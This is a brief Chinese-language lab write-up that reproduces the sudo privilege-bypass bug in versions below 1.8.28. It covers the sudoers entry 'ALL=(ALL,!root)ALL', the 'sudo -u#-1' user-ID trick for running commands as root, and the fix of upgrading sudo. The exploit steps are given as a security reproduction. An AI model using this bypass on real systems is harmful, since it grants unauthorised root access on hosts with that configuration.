Sudo提权漏洞复现

Sudo是linux的系统命令，让普通账号以root方式执行命令

?

正常来说如果普通用户需要用sudo，需要修改配置文件/etc/sudoers,将sudo使用权赋予该用户

?

而这个漏洞使得普通用户也可以绕过安全策略，执行敏感命令

漏洞影响的版本是<1.8.28

?

实验环境：kali

?

漏洞复现过程

?

1、?查看sudo版本

?

Sudo –V

?

?

?

?

?

2、?修改配置文件：vim/etc/sudoers 在root(ALL:ALL)ALL添加一行

?

Test ALL=(ALL,!root)ALL

?

?

第一个ALL表示用户可以在任意地方使用sudo

第二个（ALL,!root）表示命令可以被除了root以外的任意用户执行

最后一个ALL表示允许被执行

整体代码：test用户可以使用sudo，是除了root以外的任意用户去执行

?

?

?

注意：需要创建test用户：useradd ?test ??passwd test

?

?

?

?

?

?

?

3、?切换到test用户

?

Su test

?

然后sudo id（查看root的ID）

?

?

?

发现没有权限执行

?

4、?使用以下方法去执行想要的执行的命令

?

Sudo –u#数字 命令

?

其中数字范围：-1~4294967295，命令是系统命令

?

数字-1或者最大代表root用户

?

修复方法：更新sudo版本>=1.8.28

?

该漏洞比较鸡肋，需要管理员修改配置文件